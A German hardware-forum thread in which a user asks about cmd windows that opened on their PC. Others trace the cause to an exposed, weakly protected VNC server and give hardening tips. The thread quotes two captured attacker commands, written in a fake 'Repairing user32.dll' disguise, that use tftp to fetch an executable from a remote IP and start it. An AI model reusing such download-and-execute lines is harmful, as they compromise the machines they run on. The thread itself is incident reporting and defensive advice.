Seltsames CMD Fenster

DolGuldur

DolGuldur

Neuling
Thread Starter
Mitglied seit
01.08.2005
Beiträge
458
Nachdem ich ca 2h vom Pc weg war waren als ich wieder hinbin mehrere cmd Fenster offen. Glücklicherweise hat meine Software FW verhindert das diese ins Inet konneten bzw iwleche Sachen senden konnten,. Aber was das war weiß ich nich und das würde ich halt gern wissen vllt weiß jemand vin euch ob das nur harmlosw ar oder Virus/Trojaner.
Es war auch noch der ausführen Dialog offen und in diesem stand:

"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i ??.??.?.?? GET lvwm.exe & start lvwm&"

(die fragezeichen sind eine ip adresse die ich hier ersezt habe man weiß ja nich was sie bedeutet)

Hat wer ne ahnung was das war und vA wie sich der AUsführen dialog ohne zutun straten kann?
 
Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
Gib doch mal die IP an. Es wird versucht, lvwm.exe zu laden und dann auszuführen...
 
treffer hab VNC drAUF aberwie komtm der an des PW ... ach damn ^^
naja nach tracert is ed pc iwo in amerika (glaub ich ^^) ... hmm werd WOHl formaten is aber eh egal weil ichs des die woche eh machen wollte
hier dei ip: 70.54.3.11
 
Die IP ist ne DSL-Einwahl in Kanada.
Vielleicht war das Paßwort auch zu einfach, so daß durchprobieren oder Wörterbuchlisten geholfen haben.
 
Naja - VNC oder auch RDP würde ich sowieso nicht bloß durch ein Paßwort geschützt für das gesamte Internet öffnen.
 
..außer man braucht es wirklich, um z.b. nen server fernzuwarten (macht natürlich nur sinn mit ner festen ip oder dyndns o.ä.).. in dem fall sollte das passwort allerdings "sicher" sein, insbesondere auch lang genug, damit es nicht durch bruteforce knackbar ist.. letzteres ist bei internet-logins allerdings recht schnell zu erreichen - wenn z.b. nur ein login-versuch pro sekunde möglich ist und man alle ASCII-zeichen benutzen kann, braucht man so in etwa zwischen 50 und 100 jahre, um alle möglichkeiten eines nur 4-stelligen passworts auszuprobieren..
 
Einen Rootserver würde ich auch wegen der ungeklärten Sicherheit nicht nehmen. Trotz allem kann man noch ein paar Sachen tun:
- niemals den Standard-Port nehmen sondern einen zufällig gewählten möglichst hohen ! Den muß der Angreifer ja erstmal finden, womit min. 95% aller Angriffe wegfallen.
- Hat man einen W2003-Server (mit RDP !) dann noch die höchste Verschlüsselungsstufe einschalten.
- den Server natürlich mit aktuellen Patches bestücken.
- verbindet man sich nur von einer festen IP aus, diese im Firewall eintragen !
 
Ich würde sowieso keinen VNC Server ungeschützt betreiben.. Die Verbindung ist ja auch nicht verschlüsselt.
EDIT: Auch winzip war schon oft betroffen, z.B. "A buffer overflow vulnerability exists in WinZip and allows arbitrary code execution on the target machine when long strings are provided to certain parameters of MIME archives."
 
Zuletzt bearbeitet:
... hatte ja n Pw drauf 5 zeichen lang und ohne sinn (buchstaben+zahlen)
glaub inzwischen das des fertige bots sidn die solche angriffe fahren was damit errreicht werden soll wieß ich nich aber grad isses weider passiert diesmal vor meinen augen allerdings hat FW wieder erfolgreich verhidnert das die datei geladen wird. diesmal aber ne andre ip und ne andre dateI:
"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 68.213.254.139 GET duorjrb.exe & start duorjrb&"

Am WE hab ich zeit da kann ich das sys neuaufsetzen bis dahin geh ich entweder nich ins netz doer lass den pc net allein ^^

EDIT: hab mal geguckt und bin hierdrauf gestossen:
http://secunia.com/advisories/20107/
wenigstens weiß0 ich dases nich mein PW war :d naja VNC is vom pc ports sind zu sollte eigentlioch alles wieder kalr sein oder? (Spybpt adaware und antiviren scanner zeigen auch nichts an )
 
Zuletzt bearbeitet:
Ich hatte jetzt vergangen Mittwoch-Vormittag das selbe Phänomen.

Ich hatte telefoniert und schau auf dem Laptop und plötzlich bewegte sich der Mauszeiger, dieser ging zu "Start" - "Ausführen", "cmd" wurde hineingeschrieben und die DOS-Box ging auf. Danach wurde noch der Taskmanager gestartet.

In die Dos-Box wurde auch etwas mit "...@echo... " hineingeschrieben, ich hab dann sofort den Laptop ausgeschalten.

Scheinbar muss es mit dem Prgramm UltraVNC zusammenhängen, denn dieser stratet bei mir immer automatisch mit, und den Port hatte ich auch auf der Fritzbox freigegeben.
 
Anmelden, um zu antworten.
Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.


Zurück
Oben Unten refresh